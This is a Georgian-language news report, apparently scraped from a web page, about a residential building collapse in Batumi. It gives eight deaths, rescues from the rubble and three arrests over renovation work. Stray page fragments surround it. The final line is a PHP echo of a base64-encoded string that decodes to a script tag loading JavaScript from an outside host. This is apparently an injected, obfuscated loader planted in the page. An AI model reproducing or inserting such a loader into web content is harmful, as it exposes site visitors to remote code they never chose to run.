celsiusi
ავერსი შნაიდერი
მაშველებმა ბა­თუმ­ში, სა­ცხოვ­რე­ბელი კორპუსის ნანგრევებიდან მცირეწლოვანი ბავშვი და ქალი ამოიყვანეს. მაშველებმა ორივე ცხედარი ერთი და იმავე ლოკაციიდან ამოიყვანეს.
 
ცნობისთვის, ბათუმში, 26 მაისის ქუჩაზე გუშინ მომხდარი ტრაგედიის შედეგად 8 პირი გარდაიცვალა, აქედან 4 ერთი ოჯახის წევრია. ორი გარდაცვლილის ცხედარი კი, მაშველებმა ნანგრევებიდან რამდენიმე წუთის წინ ამოიყვანეს.
 
რაც შეეხება 36 წლის მამაკაცს, რომელიც მაშველებმა კორპუსის ნანგრევებიდან გუშინ ამოიყვანეს, ის კლინიკაშია მოთავსებული და მისი მდგომარეობა მძიმეა.
 
შინაგან საქმეთა სამინისტრომ მომხდარ ფაქტზე 3 პირი დააკავა. უწყების ინფორმაციით, ბათუმში, კორპუსის პირველ სართულზე ერთ-ერთი ბინის მესაკუთრის მითითებით სარემონტო სამუშაოები განხორციელდა, რამაც სადარბაზოს ჩამონგრევა გამოიწვია. დაკავებულია ბინის მეპატრონე და ორი მუშა.
975
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");